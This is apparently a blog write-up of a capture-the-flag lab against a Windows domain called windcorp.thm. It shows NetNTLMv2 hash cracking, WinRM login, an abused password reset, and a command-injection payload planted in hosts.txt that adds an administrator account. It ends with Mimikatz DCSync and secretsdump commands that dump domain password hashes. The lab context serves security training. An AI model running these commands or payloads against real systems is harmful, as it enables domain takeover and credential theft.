33002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000
00000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A0010000000
0000000000000000000000000000090000000000000000000000
[*] Skipping previously captured hash for WINDCORP\buse

Hash is here:

buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD00000000020006005300
4D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C00030028007300650072007600650072003200300
0300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE
5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000

NTLM Hash Cracking Phase

We need to crack this, so we’re going to use the john tool.

$ echo 'buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000' > busehash

Use john tool.

$ sudo john busehash --wordlist=/usr/share/wordlists/rockyou.txt

Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131      (buse)

Now we have a credential.

buse : uzunLM+3131

We can use another tool. First, learn the hash type.

cat busehash | hashid                                                
Analyzing 'buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:01010000000000003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C000800300030000000000000000100000000200000D06AF3C0BE5C4909A34ED0E1314D4F4E9E879FB75EC17102D80D7E32C45E88740A00100000000000000000000000000000000000090000000000000000000000'
[+] NetNTLMv2

We have NetNTLMv2. You can hashcat for it.

$ hashcat -m 5600 busehash /usr/share/wordlists/rockyou.txt

Windows Remote Management Phase

The Windows Remote Management (WinRM) protocol to execute commands and manage files on remote Windows machines. We can establish a connection with the credential we have obtained.

$ evil-winrm -i windcorp.thm -u buse -p uzunLM+3131

*Evil-WinRM* PS C:\Users\buse\Documents>

We got the connection. This is a powershell environment.

*Evil-WinRM* PS C:\Users\buse\Documents> whoami
windcorp\buse
*Evil-WinRM* PS C:\Users\buse\Documents>

Now you should get group information.

*Evil-WinRM* PS C:\Users\buse\Documents> (Get-ADUser $env:USERNAME -Properties *).MemberOf
CN=IT,OU=Groups,DC=windcorp,DC=thm
*Evil-WinRM* PS C:\Users\buse\Documents> 

Now let’s get information about the IT group:

*Evil-WinRM* PS C:\Users\buse\Documents> (Get-ADGroup "IT" -Properties *).MemberOf
CN=Account Operators,CN=Builtin,DC=windcorp,DC=thm
CN=Remote Management Users,CN=Builtin,DC=windcorp,DC=thm
CN=Remote Desktop Users,CN=Builtin,DC=windcorp,DC=thm

List all computers in AD (Active Directory):

*Evil-WinRM* PS C:\Users\buse\Documents> Get-ADComputer -Filter *

DistinguishedName : CN=FIRE,OU=Domain Controllers,DC=windcorp,DC=thm
DNSHostName       : Fire.windcorp.thm
Enabled           : True
Name              : FIRE
ObjectClass       : computer
ObjectGUID        : 816685d9-50db-488d-943b-1f4ec7ef3406
SamAccountName    : FIRE$
SID               : S-1-5-21-555431066-3599073733-176599750-1000
UserPrincipalName :

Privilege Escalation Phase

We can gather information about another user, but first we need to look at the privilege capabilities of the current user.

*Evil-WinRM* PS C:\Users\buse\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Check for other details.

*Evil-WinRM* PS C:\Users\buse\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ============================================
windcorp\buse S-1-5-21-555431066-3599073733-176599750-5777

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators                   Alias            S-1-5-32-548                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users                Alias            S-1-5-32-555                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
WINDCORP\IT                                 Group            S-1-5-21-555431066-3599073733-176599750-5865 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

We see that we are part of the Account Operators group that means we can modify all accounts except admin accounts. Let’s check if there is a script in our system.

*Evil-WinRM* PS C:\Users\buse\Documents> cd C:\
*Evil-WinRM* PS C:\> dir

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/2/2020   6:33 AM                inetpub
d-----        9/15/2018  12:19 AM                PerfLogs
d-r---         5/8/2020   7:43 AM                Program Files
d-----         5/7/2020   2:51 AM                Program Files (x86)
d-----         5/3/2020   5:48 AM                scripts
d-----        5/29/2020   5:45 PM                Shared
d-r---         5/2/2020   3:05 PM                Users
d-----        5/30/2020   7:00 AM                Windows

*Evil-WinRM* PS C:\> cd scripts
*Evil-WinRM* PS C:\scripts> dir

    Directory: C:\scripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/3/2020   5:53 AM           4119 checkservers.ps1
-a----        8/30/2024   2:30 AM             31 log.txt

*Evil-WinRM* PS C:\scripts>

We found checkservers.ps1 powershell script. We also have log.txt file.

*Evil-WinRM* PS C:\scripts> type log.txt
Last run: 08/30/2024 02:31:21
*Evil-WinRM* PS C:\scripts> type checkservers.ps1
# reset the lists of hosts prior to looping
$OutageHosts = $Null
# specify the time you want email notifications resent for hosts that are down
$EmailTimeOut = 30
# specify the time you want to cycle through your host lists.
$SleepTimeOut = 45
# specify the maximum hosts that can be down before the script is aborted
$MaxOutageCount = 10
# specify who gets notified
$notificationto = "brittanycr@windcorp.thm"
# specify where the notifications come from
$notificationfrom = "admin@windcorp.thm"
# specify the SMTP server
$smtpserver = "relay.windcorp.thm"

[redacted]
[redacted]

There seems to a script which runs every minute. This script also sends notification to brittanycr user.

A PowerShell script called checkservers.ps1, which is used to check a file called hosts.txt located in C:\Users\brittanycr\ and passes the contents of the host file to Invoke-Expression.

You can check if the user account is enabled.

*Evil-WinRM* PS C:\scripts> Get-ADUser -Identity "brittanycr" -Properties "Enabled" | Select-Object -ExpandProperty Enabled
True

Yes, it is.

We are part of the Account Operators group let’s reset the password for the account “brittanycr”.

*Evil-WinRM* PS C:\scripts> Set-ADAccountPassword -Identity brittanycr -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "helloworld:#1" -Force)

Or you can just use:

*Evil-WinRM* PS C:\scripts> net user brittanycr helloworld:#1

You can check when the password was last set for a user.

*Evil-WinRM* PS C:\scripts> Get-ADUser -Identity "brittanycr" -Properties "PasswordLastSet" | Select-Object -ExpandProperty PasswordLastSet

Friday, August 30, 2024 2:37:14 AM

*Evil-WinRM* PS C:\scripts>

We can connect via SMB with our new password.

$ smbclient -U 'brittanycr' //windcorp.thm/Users
Password for [WORKGROUP\brittanycr]:
Try "help" to get a list of possible commands.

smb: \> cd brittanycr\
smb: \brittanycr\> dir
  .                                   D        0  Sat May  2 19:36:46 2020
  ..                                  D        0  Sat May  2 19:36:46 2020
  hosts.txt                           A       22  Sun May  3 09:44:57 2020

                15587583 blocks of size 4096. 10905691 blocks available
smb: \brittanycr\> get hosts.txt
getting file \brittanycr\hosts.txt of size 22 as hosts.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \brittanycr\>

We found hosts.txt file.

$ cat hosts.txt 
google.com
cisco.com

Let’s make our malicious hosts.txt file.

$ cat hosts.txt                                      
; net user helloworld Hello12345! /add;net localgroup Administrators helloworld /add

You can use this payload too for user buse:

; Add-ADGroupMember -Identity “Domain Admins” -Members “buse” ; Add-ADGroupMember -Identity “Administrators” -Members “buse”

Now just put it.

smb: \brittanycr\> put hosts.txt
putting file hosts.txt as \brittanycr\hosts.txt (0.1 kb/s) (average 0.1 kb/s)

Now just verify and run it.

$ crackmapexec smb windcorp.thm -u helloworld -p 'Hello12345!'
SMB         windcorp.thm    445    FIRE             [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         windcorp.thm    445    FIRE             [+] windcorp.thm\helloworld:Hello12345! (Pwn3d!)

Now we have created it. Now exploit it if you need.

$ python3 /usr/share/doc/python3-impacket/examples/psexec.py helloworld@windcorp.thm 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on windcorp.thm.....
[*] Found writable share ADMIN$
[*] Uploading file eWyKxFXx.exe

[redacted]
[redacted]

You can connect via WinRM too.

$  evil-winrm -i 10.10.187.82 -u helloworld -p Hello12345!

*Evil-WinRM* PS C:\Users\helloworld\Documents> whoami
windcorp\helloworld
*Evil-WinRM* PS C:\Users\helloworld\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

We are root now!

Hashes with Mimikatz & Impacket

You need to download it https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

$ wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

Invoke-Mimikatz.ps1        [ <=>                      ] 295.93K  --.-KB/s    in 0.009s  

2024-08-30 10:16:12 (33.0 MB/s) - ‘Invoke-Mimikatz.ps1’ saved [303035]

Now use it via our new user :

*Evil-WinRM* PS C:\Users\helloworld\Documents> upload Invoke-Mimikatz.ps1
Info: Uploading Invoke-Mimikatz.ps1 to C:\Users\helloworld\Documents\Invoke-Mimikatz.ps1


Data: 2938820 bytes of 2938820 bytes copied

Info: Upload successful!

The file has been transferred. Activate it.

*Evil-WinRM* PS C:\Users\helloworld\Documents> . .\Invoke-Mimikatz.ps1

Type the following command:

*Evil-WinRM* PS C:\Users\helloworld\Documents> Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "lsadump::dcsync /user:windcorp\Administrator"'

[redacted]
[redacted]

We have admin hash value:

bfa4cae19504e0591ef0a523a1936cd4

Let’s connect via WinRM:

$ evil-winrm -i windcorp.thm -u Administrator -H bfa4cae19504e0591ef0a523a1936cd4

*Evil-WinRM* PS C:\Users\Administrator\Documents>

You can use Impacket too for getting hash:

$ python3 impacket/examples/secretsdump.py -just-dc helloworld:'Hello12345!'@10.10.187.82 -dc-ip 10.10.187.82

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bfa4cae19504e0591ef0a523a1936cd4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7e9df5e082c2637f7964cb60707f4ae4:::
windcorp.thm\redostrich210:1103:aad3b435b51404eeaad3b435b51404ee:a4ff2d641246d4e9804b7748b94d176d:::
windcorp.thm\goldenladybug228:1104:aad3b435b51404eeaad3b435b51404ee:f88583f07cb7eaf67cc7b82722bdd3f9:::
windcorp.thm\yellowostrich458:1105:aad3b435b51404eeaad3b435b51404ee:88fad4f2a0c7c10ec77fa4c0e3e82968:::
windcorp.thm\angrygorilla824:1106:aad3b435b51404eeaad3b435b51404ee:c60a512ce8ad23a3e2b8332e0471f798:::

[redacted]
[redacted]

Keynotes

  • Windows Remote Management (WinRM) is a Microsoft protocol that allows administrators to remotely manage and configure Windows operating systems. It is built on the Web Services-Management (WS-Management) protocol, which is a standard web services protocol used for systems management.
  • Spark Instant Messenger is an open-source, cross-platform instant messaging client developed by Ignite Realtime. It is designed primarily for enterprise and team communication and is known for its robust features that support secure, real-time communication. Spark is typically used in conjunction with an XMPP (Extensible Messaging and Presence Protocol) server, such as Openfire, which is also developed by Ignite Realtime.
  • NTLM (NT LAN Manager) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users. It was developed in the early 1990s and has been largely replaced by more secure protocols like Kerberos, but it is still supported and used in some scenarios, particularly for backward compatibility. NTLM relies on a password hash (NTLM hash) to authenticate users. This hash is a cryptographic representation of the user’s password.

메타데이터
post_id
3893a7cdf0bb
slug
case-spark-winrm-3893a7cdf0bb
url
https://medium.com/@brsdncr/case-spark-winrm-3893a7cdf0bb
canonical_url
https://medium.com/@brsdncr/case-spark-winrm-3893a7cdf0bb
author_url
https://medium.com/@brsdncr
status
ok
fetched_at
2026-06-27 18:20:27